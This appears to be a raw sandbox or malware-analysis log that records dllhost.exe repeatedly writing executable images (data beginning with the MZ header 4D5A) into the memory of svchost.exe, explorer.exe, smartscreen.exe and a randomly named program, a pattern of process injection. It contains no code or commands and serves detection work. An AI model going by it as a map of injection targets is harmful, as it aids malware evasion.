Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2234E120000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2234E120000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000 value starts with: 4D5A
